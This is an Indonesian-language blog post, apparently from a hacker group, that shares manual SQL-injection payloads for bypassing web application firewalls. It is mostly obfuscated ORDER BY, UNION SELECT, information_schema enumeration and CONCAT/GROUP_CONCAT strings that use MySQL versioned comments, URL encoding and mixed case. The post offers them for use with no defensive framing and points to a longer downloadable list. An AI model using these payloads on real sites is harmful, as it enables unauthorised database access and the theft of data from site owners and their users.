MACAM MACAM BYPASS WAFF TERBARU




Hallo sobat Garuda Tersakti 72
Assalamualaikum warah matullahi wabarakatuh, jumpa lagi sama gue, Hehehee 😄
Kali ini gue mau share macam-macam Bypass Waf dengan methode SQL-Injection manual, bukan yang menggunakan tools hackbar/sqlmap atau sejenisnya yaa 😄

Disini gue mau share dios Bypass Wafnya dari mulai Order by, Union Select, dan Concat nya 😁
Yuu intip ke bawah 😉

Dios pada bagian Order by :

/**/ORDER/**/BY/**/
/*!order*/+/*!by*/

Dios pada bagian Union Select :
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+

Dios pada bagian Information_shema.tables :

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table 

Dios pada bagian Concat :
CoNcAt()
concat() 
CON%08CAT()
unhex(hex(/*!50000concat*/(table_name)))

Dios pada bagian Group_Concat :
/*!group_concat*/()
gRoUp_cOnCAt()
group_concat(/*!*/)
convert(group_concat(/*!table_name*/)+using+ascii)


wkwkwk, banyak bukan? kalian gausah menghapalnya, gue udah siapin ko buat di download 😁
cek dibawah 😉

Didalem situ gue tambahin dios yang Insyaa Allah lebih lengkap pastinya dari yang diatas 😁


Jangan lupa support terus kami, kami juga membuka donasi untuk siapapun, dimanapun, dan kapanpun,
Cek website resmi milik kami di : GarudaTersakti72.id
Thanks For Reading❤
Subscribe, Like, and Share❤